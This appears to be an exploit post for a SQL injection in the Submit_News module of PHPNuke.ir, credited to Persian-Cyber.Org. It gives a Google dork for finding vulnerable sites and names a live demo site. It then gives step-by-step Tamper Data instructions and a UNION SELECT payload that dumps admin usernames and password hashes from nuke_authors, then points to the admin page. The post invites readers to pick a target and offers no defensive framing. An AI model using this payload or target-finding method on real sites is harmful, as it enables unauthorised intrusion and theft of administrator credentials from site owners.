facebook facebook twitter rss

PHPNuke.ir Submit News Sql Injection Vulnerability

Author: Persian-Cyber.Org , Published: 05-06-2015
######################
# Exploit Title : PHPNuke.ir Submit News Sql Injection Vulnerability
# Exploit Author : Persian-Cyber.Org
# Exploit Type : Public
# Contact : hacker.terrorist@yahoo.com | hacker.strange@yahoo.com
# Software Link : http://www.phpnuke.ir
# Tested on : Windows 7 , Fire Fox
# Vendor Homepage : http://www.phpnuke.ir
# Google Dork : intext:Powered By PHPNuke.ir inurl:/modules.php?name=
# Date: 5/31/2015
######################
# Demo : http://mohammadyazdani.ir/modules.php?name=Submit_News
######################
# Search Dork In The Google And Select Your Target
# Change URL To " site.com/modules.php?name=Submit_News
# Run The Tampar Data And Start Tampar
# Choose A Category And Type Something In The Fields And Click Preview
# Tampar The Send Data With Tampar Data
# Edit The Topic Number To " -<number>' UNION SELECT 1,group_concat(aid,0x3a,pwd) from nuke_authors--+ " And Send Edited Data To Server
# In The Preview You Will See The Admin Username And (Hashed) Password
# Admin Page Is In : site.com/admin.php
# Good Luck
######################
# Discovered by : TerrOrisT And Str4ng3
######################
# Greetz :
# WikE , Explo!T3r , N1F3r , Jackson , FasT ReaCtoR , Str4ng3 , Pr.H!dd3n
# And All Persian-Cyber.org Members
# Forum : www.persian-cyber.org
#######################

Like us on Facebook :